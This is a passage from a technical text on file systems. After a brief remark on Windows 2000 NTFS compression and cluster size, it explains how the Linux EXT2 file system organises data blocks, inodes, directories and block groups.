Windows 2000, like Windows NT 3.51 and Windows NT 4.0, supports file compression. Since file compression is not supported on cluster sizes above 4 K, the default NTFS cluster size for Windows 2000 never exceeds 4 K.

The Second Extended (EXT2)

Figure: Physical Layout of the EXT2 File system

The Second Extended File system was devised (by Rémy Card) as an extensible and powerful file system for Linux. It is also the most successful file system so far in the Linux community and is the basis for all of the currently shipping Linux distributions.

The EXT2 file system, like a lot of the file systems, is built on the premise that the data held in files is kept in data blocks. These data blocks are all of the same length and, although that length can vary between different EXT2 file systems the block size of a particular EXT2 file system is set when it is created (using mke2fs ). Every file's size is rounded up to an integral number of blocks. If the block size is 1024 bytes, then a file of 1025 bytes will occupy two 1024 byte blocks. Unfortunately this means that on average you waste half a block per file. Usually in computing you trade off CPU usage for memory and disk space utilisation. In this case Linux, along with most operating systems, trades off a relatively inefficient disk usage in order to reduce the workload on the CPU. Not all of the blocks in the file system hold data, some must be used to contain the information that describes the structure of the file system. EXT2 defines the file system topology by describing each file in the system with an inode data structure. An inode describes which blocks the data within a file occupies as well as the access rights of the file, the file's modification times and the type of the file. Every file in the EXT2 file system is described by a single inode and each inode has a single unique number identifying it. The inodes for the file system are all kept together in inode tables. EXT2 directories are simply special files (themselves described by inodes) which contain pointers to the inodes of their directory entries.

Figure shows the layout of the EXT2 file system as occupying a series of blocks in a block structured device. So far as each file system is concerned, block devices are just a series of blocks which can be read and written. A file system does not need to concern itself with where on the physical media a block should be put, that is the job of the device's driver. Whenever a file system needs to read information or data from the block device containing it, it requests that its supporting device driver reads an integral number of blocks. The EXT2 file system divides the logical partition that it occupies into Block Groups. Each group duplicates information critical to the integrity of the file system as well as holding real files and directories as blocks of information and data. This duplication is neccessary should a disaster occur and the file system need recovering. The subsections describe in more detail the contents of each Block Group.